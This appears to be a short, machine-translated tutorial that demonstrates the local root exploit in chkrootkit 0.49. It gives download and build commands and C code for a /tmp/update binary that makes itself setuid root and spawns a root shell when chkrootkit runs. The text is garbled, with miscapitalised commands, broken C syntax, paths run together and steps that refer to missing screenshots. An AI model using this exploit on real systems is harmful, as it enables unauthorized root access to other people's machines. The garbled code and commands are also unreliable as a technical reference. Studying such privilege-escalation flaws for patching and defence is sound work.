Chkrootkit 0.49 Local Elevation of Privilege Vulnerability
Chkrootkit <= 0.49 Local Root Vulnerability: less than or equal to version 0.49's chrootkit Local Elevation of Privilege Vulnerability. Let's demonstrate it first:
You can check whether the version you have installed has been upgraded to the latest version, or download the version with vulnerabilities for the experiment:
Wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
Tar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
Cd chkrootkit-0.49/
./Chkrootkit-V
Create update. c In the/tmp directory (the sample code is as follows ):
# Include <unistd. h>
Void main (void)
{
System ("chown root: root/tmp/update ");
System ("chmod 4755/tmp/update ");
Setuid (0 );
Setgid (0 );
Execl ("/bin/sh", "sh", NULL );
}
Compile the update file to view the update file details:
Run the vulnerability chkrootkit:
Let's take a look at the fact that update has successfully belonged to the root group!
References:
Http://www.exploit-db.com/exploits/33899/
Hackluom.net/chkrootkit-local-root/Vulnerability